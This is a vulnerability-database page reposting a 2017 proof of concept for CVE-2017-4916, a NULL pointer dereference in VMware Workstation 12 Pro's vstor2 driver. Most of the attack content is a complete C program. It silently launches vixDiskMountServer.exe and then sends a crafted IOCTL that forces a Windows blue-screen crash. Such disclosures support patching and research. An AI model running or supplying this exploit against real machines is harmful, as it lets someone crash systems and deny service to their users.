Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VMware Workstation 12 Pro Denial Of Service

🗓️ 08 Jun 2017 00:00:00Reported by Borja MerinoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 47 Views

VMware Workstation 12 Pro Denial Of Service with NULL pointer dereference vulnerability in vstor2 drive

Related
Code
ReporterTitlePublishedViews
Family
0day.today		VMware Workstation 12 Pro - Denial of Service Exploit
8 Jun 201700:00
zdt
Circl		CVE-2017-4916
23 May 201712:53
circl
CNVD		VMware Workstation Pro for Windows and VMware Workstation Player for Windows vstor2 Driver Denial of Service Vulnerability
24 May 201700:00
cnvd
CVE		CVE-2017-4916
22 May 201714:00
cve
Cvelist		CVE-2017-4916
22 May 201714:00
cvelist
EUVD		EUVD-2017-14033
7 Oct 202500:30
euvd
Kaspersky		KLA11019 Multiple vulnerabilities in VMware products
18 May 201700:00
kaspersky
NVD		CVE-2017-4916
22 May 201714:29
nvd
OSV		CVE-2017-4916
22 May 201714:29
osv
Prion		Null pointer dereference
22 May 201714:29
prion
Rows per page
`/*  
* Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)  
* CVE: 2017-4916 (VMSA-2017-0009)  
* Author: Borja Merino (@BorjaMerino)  
* Date: May 18, 2017  
* Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMwareA(r) Workstation 12 Pro (12.5.5 build-5234757)  
* Affected: VMware Workstation Pro/Player 12.x  
* Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device  
* driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)  
*/  
  
#include "windows.h"  
#include "stdio.h"  
  
void ioctl_crash()  
{  
HANDLE hfile;  
WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";  
DWORD dummy;  
char reply[0x3FDC];  
hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);  
char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";  
DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);  
}  
  
void run_vix()  
{  
STARTUPINFO si;  
PROCESS_INFORMATION pi;  
RtlZeroMemory(&si, sizeof(si));  
RtlZeroMemory(&pi, sizeof(pi));  
si.dwFlags |= STARTF_USESHOWWINDOW;  
si.wShowWindow = SW_HIDE;  
DWORD createFlags = CREATE_SUSPENDED;  
CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);  
}  
  
void main()  
{  
run_vix(); //Comment this if vixDiskMountServer.exe is already running  
ioctl_crash();  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jun 2017 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.09503
vmware workstation pro/playervstor2 driverdenial of servicebsodioctl codemultiple_irp_complete_requests bug checkwindows 10 prowindows 7 procve-2017-4916vmsa-2017-0009vixdiskmountserver.execreateprocessdeviceiocontrol.
47